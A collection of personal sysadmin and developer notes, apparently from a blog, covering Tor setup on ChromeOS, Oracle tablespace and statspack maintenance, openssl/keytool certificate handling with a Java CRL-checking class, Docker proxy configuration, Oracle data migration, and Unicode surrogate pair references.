  • Start Orbot, setup port forward on Proxy Server 127.0.0.1:8080 -> 127.0.0.1:8118 (Orbot service)

  • In crosh, type adb forward tcp:8080 tcp:8080

  • Ensure ChromeOS has a IP (assigned by wifi or bridged), configure the proxy as 127.0.0.1:8080

  • Now it is time to access following urls,
    http://check.torproject.org/
    https://duckduckgo.com/
    https://www.tor2web.org/ http://thehiddenwiki.org/

  • Install tor-browser (it is firefox based) in ubuntu

    1
    2
    3
    4
    5
    6
    7
    sudo vi /etc/apt/apt.conf.d/10proxy (Acquire::http::Proxy "http://192.168.137.1:21/";)
    export http://192.168.137.1:21/
    export http_proxy=http://192.168.137.1:21/
    export https_proxy=http://192.168.137.1:21/
    sudo -E add-apt-repository ppa:webupd8team/tor-browser
    sudo apt-get update
    sudo apt-get install tor-browser
  • If you do not want to surf internet with Tor, just stop Orbot and Proxy Server, start Proxoid

Reference:

http://www.omgchrome.com/an-introduction-to-tor-on-chrome-os/
https://docs.google.com/document/d/1I1lBG1P2GOf3ooNhX-5pyrVF6RnxmpuEw62pi17Tb0I/edit
http://www.ubertechblog.com/2011/07/beginners-guide-to-deep-web-or-darknet.html

Fix issue of “read from TUN/TAP : File descriptor in bad state (code=77)” when run openvpn azilink.ovpn after upgrading chromeos

Run the following command in your shell on ChromeOS (the shell, not crosh)

1
2
sudo stop shill
sudo start shill BLACKLISTED_DEVICES=tun0

when-to-use-rebuild-vs-coalesce-vs-shrink

  • Find out the table size
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    SELECT owner, segment_name, segment_type, partition_name, ROUND(bytes/(1024*1024),2) SIZE_MB, tablespace_name
    FROM DBA_SEGMENTS
    WHERE SEGMENT_TYPE IN ('TABLE', 'TABLE PARTITION', 'TABLE SUBPARTITION',
    'INDEX', 'INDEX PARTITION', 'INDEX SUBPARTITION', 'TEMPORARY', 'LOBINDEX', 'LOBSEGMENT', 'LOB PARTITION')
    --AND TABLESPACE_NAME LIKE 'COSTE%'
    --AND SEGMENT_NAME LIKE 'P2010201%'
    --AND partition_name LIKE 'P20100201%'
    --AND segment_type = 'TABLE'
    --AND OWNER = 'TARGET_POC'
    --AND ROUND(bytes/(1024*1024),2) > 1000
    ORDER BY bytes DESC;

You can group by tablespace, owner and segment type and see the total space occupied in MBytes

1
2
3
4
5
6
7
SELECT tablespace_name, owner, segment_type "Object Type",
COUNT(owner) "Number of Objects",
ROUND(SUM(bytes) / 1024 / 1024, 2) "Total Size in MB"
FROM sys.dba_segments
WHERE tablespace_name IN ('MPIS')
GROUP BY tablespace_name, owner, segment_type
ORDER BY tablespace_name, owner, segment_type;
  • find out the usage of tablespace

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    select df.tablespace_name "Tablespace",
    totalusedspace "Used MB",
    (df.totalspace - tu.totalusedspace) "Free MB",
    df.totalspace "Total MB",
    round(100 * ( (df.totalspace - tu.totalusedspace)/ df.totalspace))
    "Pct. Free"
    from
    (select tablespace_name,
    round(sum(bytes) / 1048576) TotalSpace
    from dba_data_files
    group by tablespace_name) df,
    (select round(sum(bytes)/(1024*1024)) totalusedspace, tablespace_name
    from dba_segments
    group by tablespace_name) tu
    where df.tablespace_name = tu.tablespace_name order by "Pct. Free";
  • Shrink table

    1
    2
    alter table STATS$SQL_SUMMARY enable row movement;
    alter table STATS$SQL_SUMMARY shrink space;
  • Shrink index

    1
    2
    3
    4
    5
    alter index STATS$SQL_SUMMARY_PK shrink space compact
    alter index STATS$SQL_SUMMARY_PK shrink space;
    alter index STATS$SYSSTAT_PK coalesce
    alter index STATS$SQL_SUMMARY_PK rebuild
    shrink space compact = coalesce
  • Reference
    when-to-use-rebuild-vs-coalesce-vs-shrink-space
    深入理解重建索引
    Alter index coalesce VS shrink space
    alter index coalesce和alter index rebuild的区别

Learn certificate revocation list

jks -> p12 p12 -> pem (cer) pem (cer) -> der

  • Convert a DER crl to PEM openssl crl -CAfile root.pem eCertCA1-10CRL2.pem
  • java keytool keytool -trustcacerts -import -alias alias -keystore cacerts.jks -file prod.der keytool -v -importkeystore -srckeystore cacerts3.jks -srcalias alias -destkeystore temp.p12 -deststoretype PKCS12 -srcstorepass password -deststorepass 1304478222600604 keytool -list -v -keystore xxp12 -storepass 112233 -storetype pkcs12
  • export private key openssl pkcs12 -in prod.cer -out csr_private.key -nocerts -nodes -password pass:1304478222600604
  • print basic information in p12 openssl pkcs12 -in xx.p12 -clcerts -nokeys|openssl x509 -text -noout
  • print information in PEM format certificate openssl x509 -in certificate.crt -text -noout
  • Export DER and PEM encoded certificate By java
    1
    2
    3
    4
    5
    6
    7
    for(String alias : keyStore.aliases()){
    if (keyStore.isKeyEntry(alias)) {
    certificate = ((X509Certificate) keyStore.getCertificate(alias);
    }
    }

    byte[] cert_der_format = certificate.getEncoded(); // DER Encoded String cert_pem_format = X509Factory.BEGIN_CERT + new String(BASE64EnCoder.encode(cert_der_format)) + “\n” + X509Factory.END_CERT; // PEM Encoded
    By Keytool
1
2
keytool -exportcert -alias herong_key -keypass keypass -keystore herong.jks -storepass jkspass -file keytool_crt.der
keytool -exportcert -alias herong_key -keypass keypass -keystore herong.jks -storepass jkspass -rfc -file keytool_crt.pem
  • Methods for getting certificate information
    By keytool
    1
    2
    keytool -list -v -keystore abc.p12 -storepass 1234 -storetype pkcs12
    keytool -printcert -file keytool_crt.pem
    By openssl
1
2
openssl x509 -in keytool_crt.pem -text -noout`
openssl x509 -in keytool_crt.der -inform der -text -noout
  • Convert p12 file from cert.p12 to cert2.p12
    1
    2
    openssl pkcs12 -clcerts -nokeys -in cert.p12 -out usercert.pem // public key
    openssl pkcs12 -nocerts -in cert.p12 -out userkey.pem // private key
    Merge it
    openssl pkcs12 -export -out cert2.p12 -inkey ./userkey.pem -in ./usercert.pem

java ValidateCertUseCRL
DER vs. CRT vs. CER vs. PEM Certificates and How To Convert Them
DER (Distinguished Encoding Rules) certificate encoding
Verify Certificate is revoked by CRL
Using openssl to extract private key
SSL Converter
article-most-common-openssl-commands
normalize your certificate
Certificates: File Format & Conversion
keytool Exporting Certificates in DER and PEM
OpenSSL Validating Certificate Path
“keytool” Viewing Certificates in DER and PEM

  • No way to get CRL path using api from ibm jar, just find keyword CRLDistributionPoints by toString getExtension(new ObjectIdentifier(key)) as below;
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    279
    280
    281
    282
    283
    284
    285
    286
    287
    288
    289
    290
    291
    292
    293
    294
    295
    296
    297
    298
    299
    300
    301
    302
    303
    304
    305
    306
    307
    308
    309
    310
    311
    312
    313
    314
    315
    316
    317
    318
    319
    320
    321
    322
    323
    324
    325
    326
    327
    328
    329
    330
    331
    332
    333
    334
    335
    336
    337
    338
    339
    340
    341
    342
    343
    344
    345
    346
    347
    348
    349
    350
    351
    352
    353
    354
    355
    356
    357
    358
    359
    360
    361
    362
    363
    364
    365
    366
    367
    368
    369
    370
    371
    372
    373
    374
    375
    376
    377
    378
    379
    380
    381
    382
    383
    384
    385
    386
    387
    388
    389
    390
    391
    392
    393
    394
    395
    396
    397
    package xx;

    import java.io.DataInputStream;
    import java.io.File;
    import java.io.FileInputStream;
    import java.io.IOException;
    import java.io.InputStream;
    import java.net.URL;
    import java.net.URLConnection;
    import java.security.InvalidAlgorithmParameterException;
    import java.security.InvalidKeyException;
    import java.security.KeyStore;
    import java.security.KeyStoreException;
    import java.security.MessageDigest;
    import java.security.NoSuchAlgorithmException;
    import java.security.PrivateKey;
    import java.security.PrivilegedActionException;
    import java.security.Signature;
    import java.security.UnrecoverableKeyException;
    import java.security.cert.CertPath;
    import java.security.cert.CertPathValidator;
    import java.security.cert.CertPathValidatorException;
    import java.security.cert.CertStore;
    import java.security.cert.Certificate;
    import java.security.cert.CertificateEncodingException;
    import java.security.cert.CertificateException;
    import java.security.cert.CertificateExpiredException;
    import java.security.cert.CertificateFactory;
    import java.security.cert.CertificateNotYetValidException;
    import java.security.cert.CertificateParsingException;
    import java.security.cert.CollectionCertStoreParameters;
    import java.security.cert.PKIXCertPathValidatorResult;
    import java.security.cert.PKIXParameters;
    import java.security.cert.TrustAnchor;
    import java.security.cert.X509CRL;
    import java.security.cert.X509Certificate;
    import java.util.Collections;
    import java.util.Enumeration;
    import java.util.HashSet;
    import java.util.Iterator;
    import java.util.List;
    import java.util.ResourceBundle;
    import java.util.Set;
    import java.util.Vector;
    import com.ibm.security.util.ObjectIdentifier;
    import com.ibm.security.x509.Extension;
    import com.ibm.security.x509.X509CertImpl;

    public class Authenticator {
    private static final String start = "-----BEGIN CERTIFICATE-----\n";
    private static final String end = "-----END CERTIFICATE-----";

    private ResourceBundle m_configuration = ResourceBundle.getBundle("dh.properties.pkcs12");
    private KeyStore m_keyStore = null;
    private boolean keyStoreLoaded = false;
    private String certificateID = "";
    private X509Certificate certificate;
    private String password = "";

    public KeyStore loadKeyStore(final InputStream inStream, final String password) throws KeyStoreException,
    NoSuchAlgorithmException, CertificateException, IOException {
    String keyStoreType = m_configuration.getString("KEY_STORE_TYPE");
    try {
    m_keyStore = KeyStore.getInstance(keyStoreType);
    } catch (KeyStoreException e) {
    e.printStackTrace();
    throw e;
    }

    System.out.println("load the p12 file");
    if (password != null) {
    this.password = password;
    m_keyStore.load(inStream, password.toCharArray());
    } else {
    m_keyStore.load(inStream, null);
    }

    System.out.println("file is loaded successful");
    keyStoreLoaded = true;

    return m_keyStore;
    }

    public String getCertificateID() throws KeyStoreException {
    System.out.println("calling getCertificateID()"); //$IGN_Avoid_standard_output_input_error$<working as intended> //$IGN_Remove_System_print_or_println_statements$<working as intended>
    if (!keyStoreLoaded) {
    throw new KeyStoreException("Key store has not been loaded.");
    }

    StringBuffer result = new StringBuffer();

    try {
    Enumeration<String> aliases = m_keyStore.aliases();
    while (aliases.hasMoreElements()) {
    String alias = aliases.nextElement();
    if (m_keyStore.isKeyEntry(alias)) {
    result.append(alias);
    }
    }
    } catch (KeyStoreException e) {
    e.printStackTrace();
    throw e;
    }

    return result.toString();
    }

    public String getEncocdedCertificate() throws KeyStoreException {
    System.out.println("calling getCertificate()"); //$IGN_Avoid_standard_output_input_error$<working as intended> //$IGN_Remove_System_print_or_println_statements$<working as intended>

    if (!keyStoreLoaded) {
    throw new KeyStoreException("Key store has not been loaded.");
    }

    try {
    certificate = retrieveCertificate();
    } catch (Exception e) {
    e.printStackTrace();
    return "";
    }

    try {
    return start + new String(BASE64Coder.encode(certificate.getEncoded())) + "\n" + end;
    } catch (CertificateEncodingException e) {
    e.printStackTrace();
    }
    return "";
    }

    private X509Certificate retrieveCertificate() throws KeyStoreException, CertificateExpiredException,
    CertificateNotYetValidException {
    if (!keyStoreLoaded) {
    throw new KeyStoreException("Key store has not been loaded.");
    }

    Certificate cert = m_keyStore.getCertificate(certificateID);

    if (cert == null) {
    //System.out.println("Searching for all aliases");
    Enumeration<String> aliases = m_keyStore.aliases();

    while (aliases.hasMoreElements()) {
    String alias = aliases.nextElement().trim();

    if (m_keyStore.isKeyEntry(alias)) {
    cert = m_keyStore.getCertificate(alias);

    if (cert == null) {
    continue;
    }

    }
    }
    }

    if (cert instanceof X509Certificate) {
    certificate = (X509Certificate) cert;
    }

    try { //$IGN_Place_try_catch_out_of_loop$<working as intended>
    certificate.checkValidity();
    } catch (CertificateExpiredException e) {
    System.out.println(e);
    throw e;
    } catch (CertificateNotYetValidException e) {
    System.out.println(e);
    throw e;
    } //$IGN_Always_use_caught_exception$<working as intended>

    return certificate;
    }

    public String getSubjectDN() throws CertificateExpiredException, CertificateNotYetValidException, KeyStoreException {
    certificate = retrieveCertificate();
    try {
    String principal = certificate.getSubjectX500Principal().getName();
    return principal;
    } catch (Exception e) {
    String subjectDNName = certificate.getSubjectDN().getName();
    return subjectDNName;
    }
    }

    public void checkCRL() throws CertPathValidatorException {
    System.out.println("calling checkCRL");
    if (certificate == null) {
    try {
    certificate = retrieveCertificate();
    } catch (Exception e) {
    e.printStackTrace();
    }
    }

    CertPath cp = null;
    Vector<Certificate> certs = new Vector<Certificate>();

    // load the cert to be checked
    certs.add(certificate);

    // handle location of CRL
    //System.out.println("Using the CRL specified in the " + "cert to check the revocation status of: "
    // + certs.elementAt(0));
    System.setProperty("com.sun.security.enableCRLDP", "true");

    CertificateFactory cf = null;
    // init cert path
    PKIXParameters params = null;
    try {
    cf = CertificateFactory.getInstance("X509");
    cp = (CertPath) cf.generateCertPath(certs);

    // load the root CA cert
    String rootCaCert = m_configuration.getString("ROOT_CA_CERT");
    X509Certificate rootCACert = getCertFromFile(rootCaCert);
    System.out.println("rootCACert = " + rootCACert);

    // init trusted certs
    TrustAnchor ta = new TrustAnchor(rootCACert, null);
    Set<TrustAnchor> trustedCerts = new HashSet<TrustAnchor>();
    trustedCerts.add(ta);

    // init PKIX parameters
    params = new PKIXParameters(trustedCerts);
    } catch (CertificateException e) {
    System.out.println(e);
    return;
    } catch (Exception e) {
    System.out.println(e);
    return;
    }

    URL url = null;
    X509CertImpl certificateImpl = (X509CertImpl) certificate;

    Set<String> oids = certificateImpl.getNonCriticalExtensionOIDs();
    for (String key : oids) {
    System.out.println("key = " + key);
    try {
    Extension e = certificateImpl.getExtension(new ObjectIdentifier(key));
    String val = e.toString();
    if (val.indexOf("CRLDistributionPoints") != -1) {
    int start = val.indexOf("http");
    int end = val.indexOf(".crl");
    url = new URL(val.substring(start, end + 4));
    }
    } catch (Exception ex) {
    System.out.println(ex);
    }
    }

    // load the CRL
    try {
    if (url != null) {
    URLConnection connection = url.openConnection();
    connection.setDoInput(true);
    connection.setUseCaches(false);
    DataInputStream inStream = new DataInputStream(connection.getInputStream());
    X509CRL crl = (X509CRL) cf.generateCRL(inStream);
    inStream.close();

    params.addCertStore(CertStore.getInstance("Collection", new CollectionCertStoreParameters(Collections
    .singletonList(crl))));
    params.setRevocationEnabled(true);
    }
    } catch (Exception e) {
    System.out.println("fail to load url " + url);
    System.out.println(e);
    }

    // perform validation
    try {
    CertPathValidator cpv = CertPathValidator.getInstance("PKIX");

    PKIXCertPathValidatorResult cpv_result = (PKIXCertPathValidatorResult) cpv.validate(cp, params);
    X509Certificate trustedCert = (X509Certificate) cpv_result.getTrustAnchor().getTrustedCert();
    if (trustedCert == null) {
    System.out.println("Trusted Cert = NULL");
    } else {
    System.out.println("Trusted CA DN = " + trustedCert.getSubjectDN());
    }
    System.out.println("CERTIFICATE VALIDATION SUCCEEDED");
    } catch (NoSuchAlgorithmException e) {
    System.out.println(e);
    } catch (CertPathValidatorException e) {
    e.printStackTrace();
    throw e;
    } catch (InvalidAlgorithmParameterException e) {
    System.out.println(e);
    }
    }

    private static X509Certificate getCertFromFile(String path) {
    X509Certificate cert = null;
    try {
    File certFile = new File(path);
    if (!certFile.canRead())
    throw new IOException(" File " + certFile.toString() + " is unreadable");

    FileInputStream fis = new FileInputStream(path);
    CertificateFactory cf = CertificateFactory.getInstance("X509");
    cert = (X509Certificate) cf.generateCertificate(fis);

    } catch (Exception e) {
    System.out.println("Can't construct X509 Certificate. " + e.getMessage());
    }
    return cert;
    }

    /**
    * GeneralName ::= CHOICE {
    * otherName [0] OtherName,
    * rfc822Name [1] IA5String,
    * dNSName [2] IA5String,
    * x400Address [3] ORAddress,
    * directoryName [4] Name,
    * ediPartyName [5] EDIPartyName,
    * uniformResourceIdentifier [6] IA5String,
    * iPAddress [7] OCTET STRING,
    * registeredID [8] OBJECT IDENTIFIER}
    * @see java.security.cert.X509Certificate#getSubjectAlternativeNames()
    * @link http://www.ietf.org/rfc/rfc2459.txt
    */
    private String getDomainName() {
    String domainName = "";

    try {
    Iterator it = certificate.getSubjectAlternativeNames().iterator();
    while (it.hasNext()) {
    List list = (List) it.next();
    if (((Integer) list.get(0)).intValue() == 2) {
    domainName = list.get(1).toString();
    }
    }

    } catch (CertificateParsingException e) {
    // TODO Auto-generated catch block
    e.printStackTrace();
    }

    return domainName;
    }

    private String encodeID(String hkid) {
    Signature signature = null;
    PrivateKey key = null;
    String hashAlgorithm = "SHA-1";
    try {
    key = (PrivateKey) m_keyStore.getKey(getCertificateID(), this.password.toCharArray());
    String signingAlgorithm = "SHA1with" + key.getAlgorithm();
    signature = Signature.getInstance(signingAlgorithm);
    } catch (UnrecoverableKeyException e) {
    System.out.println("UnrecoverableKeyException " + e);
    } catch (KeyStoreException e) {
    System.out.println("KeyStoreException " + e);
    } catch (NoSuchAlgorithmException e) {
    System.out.println("NoSuchAlgorithmException " + e);
    }

    try {
    signature.initSign(key);
    signature.update(hkid.getBytes("UTF-8"));

    byte[] signed = signature.sign();
    MessageDigest digest = null;
    digest = MessageDigest.getInstance(hashAlgorithm);
    //System.out.println("Got MD algorithm");
    String encodedID = new String(BASE64Coder.encode(digest.digest(signed)));
    System.out.println("Done hashing");
    return encodedID;
    //signature.initVerify(certificate.getPublicKey());
    /*if (signature.verify(signed)) {

    }*/
    } catch (Exception ignore) {
    System.out.println("Exception " + ignore);
    }
    return "";
    }

    public boolean checkHKID(String hkid) {
    System.out.println("check HKID");
    String domainName = getDomainName();
    String encodedID = encodeID(hkid);

    System.out.println("domainName = " + domainName);
    System.out.println("encodedID = " + encodedID);

    if (encodedID.length() != domainName.length())
    return false;

    for (int i = 0; i < encodedID.length(); i++)
    if (encodedID.charAt(i) != domainName.charAt(i))
    return false;

    return true;
    }
    }

— Class 2 —
Using it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
Authenticator auth = new Authenticator();
try {
auth.loadKeyStore(in, certPin);
} catch (KeyStoreException e) {
System.out.println("KeyStoreException error = " + e.getMessage());
errMsg = bundle.getString(ErrMsgConfig.ECERT00007);
} catch (NoSuchAlgorithmException e) {
System.out.println("NoSuchAlgorithmException error = " + e.getMessage());
errMsg = bundle.getString(ErrMsgConfig.ECERT00019);
} catch (CertificateException e) {
System.out.println("CertificateException error = " + e.getMessage());
errMsg = bundle.getString(ErrMsgConfig.ECERT00007);
} catch (IOException e) {
System.out.println("IOException error = " + e.getMessage());
errMsg = bundle.getString(ErrMsgConfig.ECERT00019);
}

String subjectDN = "";

if (errMsg.length() == 0) {
try {
subjectDN = auth.getSubjectDN();
} catch (CertificateExpiredException e) {
System.out.println("CertificateExpiredException error = " + e.getMessage());
errMsg = bundle.getString(ErrMsgConfig.ECERT00002);
} catch (CertificateNotYetValidException e) {
System.out.println("CertificateNotYetValidException error = " + e.getMessage());
errMsg = bundle.getString(ErrMsgConfig.ECERT00003);
}
}

System.out.println("subject: " + subjectDN);
if (errMsg.length() == 0) {
try {
boolean valid = RmiSignVerifier.checkCRL(auth.getEncocdedCertificate());
if (!valid) {
errMsg = bundle.getString(ErrMsgConfig.ECERT00014);
}
} catch (CertPathValidatorException e) {
System.out.println("CertPathValidatorException error = " + e.getMessage());
errMsg = bundle.getString(ErrMsgConfig.ECERT00004);
}
}

if (errMsg.length() == 0) {
req.setAttribute("errMsg", errMsg);

List<Rdn> names = new LdapName(subjectDN).getRdns();
for (Rdn name : names) {
System.out.println("rdn " + name.getType() + ", " + name.getValue());
String value = name.getValue().toString();

if (name.getType().equals("O")) {
if (value.indexOf("Hongkong Post") == -1) {
errMsg = bundle.getString(ErrMsgConfig.ECERT00007);
}

if (value.indexOf(CERT_TYPE_ORGANIZATIONAL) != -1) {
certType = CERT_TYPE_ORGANIZATIONAL;
} else {
certType = CERT_TYPE_PERSONAL;
}
}

if (name.getType().equals("OU")) {
Pattern p = Pattern.compile("\\d+");

if (p.matcher(value).matches()) { // check digit
if (value.length() > 10) {
brc = value.substring(0, 8);
brcBranchCode = value.substring(8, 11);
} else {
srn = value;
session.setAttribute("CERT_SRC_NO", srn);
System.out.println("srn " + srn);
}
}
}
if (name.getType().equals("CN")) {
holdername = value;
session.setAttribute("holdername", holdername);
System.out.println("holdername: " + holdername);
}
}

System.out.println("certificate Type " + certType);

if (certType.equals(CERT_TYPE_PERSONAL)) {
if (!auth.checkHKID(userHKID)) {
errMsg = bundle.getString(ErrMsgConfig.ECERT00008);
}
}
}
  • With oracle java api, it can be used to get crl path elegantly.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    CRLDistributionPointsExtension crlDistributionPointsExtension = certificateImpl.getCRLDistributionPointsExtension();

    if (crlDistributionPointsExtension != null) {
    try {
    for (DistributionPoint distributionPoint : ((List<DistributionPoint>) crlDistributionPointsExtension
    .get(CRLDistributionPointsExtension.POINTS))) {
    for (GeneralName generalName : distributionPoint.getFullName().names()) {
    String generalNameString = generalName.toString();
    System.out.println(generalNameString);
    String crlURLString = generalNameString.substring(9);
    crlUrl = new URL(crlURLString);
    }
    }
    } catch (Exception ex) {
    throw new CertPathValidatorException(ex);
    }
    }
  • But finally check whether CRL is revoked, just call crl.isrevoked to work. Damn!

stackpack

  • Get all snapshot

select * from STATS$snapshot;

  • Check database instance

    1
    2
    select * from STATS$DATABASE_INSTANCE; – in case database restarted, an error will be thrown as ORA-20200: The instance was shutdown between snapshots 981 and 982
    select * from v$instance;
  • Run stackpack

    1
    2
    3
    4
    sqlplus perfstat/password@“(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521))(CONNECT_DATA=(SERVICE_NAME=xxrac)))”
    @$ORACLE_HOME/rdbms/admin/spreport.sql
    OR
    @?/rdbms/admin/spreport.sql
  • Purge stackpack

    1
    2
    3
    @$ORACLE_HOME/rdbms/admin/sppurge.sql
    OR
    @?/rdbms/admin/sppurge.sql
  • Oracle jobs

    1
    2
    3
    select * from user_jobs; SELECT job, next_date, next_sec, failures, broken, SUBSTR(what,1,40) DESCRIPTION FROM dba_jobs; 
    EXEC dbms_job.broken(24, false);
    EXEC dbms_job.run(24, false); – reset job when failure 16 attemps to run
  • Oracle job for schedule run sppurge

——————– Check the snap present before 20 days ——————–

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
select count(*) from stats$snapshot where snap_time < sysdate-20

----Create the procedure which will purge statspack snapshot after 20 days gap---------
create or replace procedure statspackpurge is
var_lo_snap number;
var_hi_snap number;
var_db_id number;
var_instance_no number;
noofsnapshot number;
n_count number ;
begin

n_count := 0;

select count(*) into n_count from stats$snapshot where snap_time < sysdate-20;

if n_count > 0 then

select min(s.snap_id) , max(s.snap_id),max(di.dbid),max(di.instance_number) into var_lo_snap, var_hi_snap,var_db_id,var_instance_no
from stats$snapshot s
, stats$database_instance di
where s.dbid = di.dbid
and s.instance_number = di.instance_number
and di.startup_time = s.startup_time
and s.snap_time < sysdate-20;

noofsnapshot := statspack.purge( i_begin_snap => var_lo_snap
, i_end_snap => var_hi_snap
, i_snap_range => true
, i_extended_purge => false
, i_dbid => var_db_id
, i_instance_number => var_instance_no);

dbms_output.Put_line('snapshot deleted'||to_char(noofsnapshot));

end if;
end;
/

——————– check the job already exits in the database ——————–

1
SELECT  job, next_date, next_sec, failures, broken, SUBSTR(what,1,40) DESCRIPTION FROM dba_jobs;

——————– scheduled the job at mid night ——————–

1
2
3
4
5
6
7
8
9
declare
my_job number;
begin
dbms_job.submit(job => my_job,
what => 'statspackpurge;',
next_date => trunc(sysdate)+1,
interval => 'trunc(sysdate)+1');
end;
/

————– Another way———————————————————-

1
2
3
4
5
6
variable v_jobno number;
begin
dbms_job.submit(:v_jobno,'statspack.purge(i_num_days=>15,i_extended_purge=>TRUE);',trunc(sysdate)+1+2/24,'SYSDATE',TRUE);
commit;
end;
/
  • Reference

Stackpack
http://www.oracle-base.com/articles/8i/statspack-8i.php
http://docs.oracle.com/cd/B10500_01/server.920/a96533/statspac.htm

Oracle job
http://www.orafaq.com/wiki/DBMS_JOB
http://www.dba-oracle.com/tips_oracle_statspack_purge_utility.htm
http://myoracleworld.hobby-electronics.net/DB-statspack.html
http://dbaworks-sunny.blogspot.hk/2012/12/statspack-purge-script-for-scheduling.html
http://docs.oracle.com/cd/B19306_01/appdev.102/b14258/d_job.htm#i1000769

Dive Into Docker

Step

Ubuntu 14.04

Host-only ethernet adapter in VirtualBox

1
2
3
4
5
6
7
8
sudo apt-get update
sudo apt-get install openssh-server -y
sudo apt-get install docker -y
sudo ln /usr/bin/docker.io /usr/local/bin/docker
sudo service docker.io stop
sudo HTTP_PROXY=http://192.168.56.1:21/
docker -d &
alias d='sudo docker'

Proxy

  • apt-get
    create a file named proxy in /etc/apt/apt.conf.d/ as below,
    Acquire::http::Proxy “http://192.168.56.1:21”;
  • git
    git config –global http.proxy http://192.168.56.1:21
  • wget
    /etc/wgetrc -> http_proxy = http://192.168.56.1:21
  • docker
    sudo HTTP_PROXY=http://192.168.56.1:21/ docker.io -d &
  • curl
    export http_proxy=http://192.168.56.1:21/
    export https_proxy=http://192.168.56.1:21/

Reference

boot2docker
lightweight_docker_experience_on_osx
docs.docker.io
TheDockerBook_sample

Migration

#Call external bat (do not use cmd /c) and substring in bat file

1
2
3
4
5
6
7
8
9
call C:\Production_ATV_Windows_LD\ATV.bat -L > filename.txt

FOR /F "tokens=2 delims=][" %%i in (filename.txt) do set today=%%i

call C:\Production_ATV_Windows_LD\ATV.bat -DD -FilePre %today% -Overwrite

rem set today=PPSC140429
set today=%today:~0,10%
#Export/Import data from oracle 9i to oracle11g
  • export NLS_LANG=TRADITIONAL CHINESE_HONG KONG.AL32UTF8
  • export schema : exp usr/passwd@uatrac file=db.dmp ROWS=N log=db.log
  • edit db.dmp and change tablespace from ABC to XYZ
  • import schema : imp usr/passwd@prdrac file=db.dmp log=db.log
  • export data : exp usr/passwd@uatrac tables=ABC file=db.dmp INDEXES=N CONSTRAINTS=N GRANTS=N ROWS=Y log=db.log
  • disable insert triggers
  • import data : imp usr/passwd@prdrac file=data.dmp IGNORE=Y INDEXES=N CONSTRAINTS=N GRANTS=N ROWS=Y fromUser=abc toUser=xyz commit=y buffer=1024000 log=db.log

Some findings on studying surrogate pair

HKSCS

Unicode surrogate programming with the Java language
谈Unicode编码,简要解释UCS、UTF、BMP、BOM等名词
HKSCS-2004 Support for Windows Platform
「HKSCS compatibility」– 香港字集兼容方案
Hong Kong Supplementary Character Set - 2004
HKSCS
HKSCS 字碼表
Win7 睇香港字問題
關於Windows 7用code page 951既問題
XML Services
Universal Character Set characters - Surrogates
Block-U20000-CJK-Unified-Ideographs-Extension-B
Unicode5.2.0
Java中的字符集编码入门技巧
Chinese / HKSCS 2004 conversion script

Surrogate

Why UTF-32 instead of UTF-16 if we have surrogate pairs?
handling-unicode-surrogate-values-in-java-strings
what-is-a-surrogate-pair-in-java
Java中的字符集编码入门(六)Java中的增补字符

XMLBeans Related

Piccolo XML Parser for Java

Sample

1
2
00000010 00100100 01100101
10001011 10111001

28BB9

►Unicode Code Point Blocks - Code Charts

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
U0000: C0 Controls and Basic Latin
U0080: C1 Controls and Latin-1 Supplement
U0100: Latin Extended-A
U0180: Latin Extended-B
U0250: IPA Extensions
U02B0: Spacing Modifier Letters
U0300: Combining Diacritical Marks
U0370: Greek and Coptic
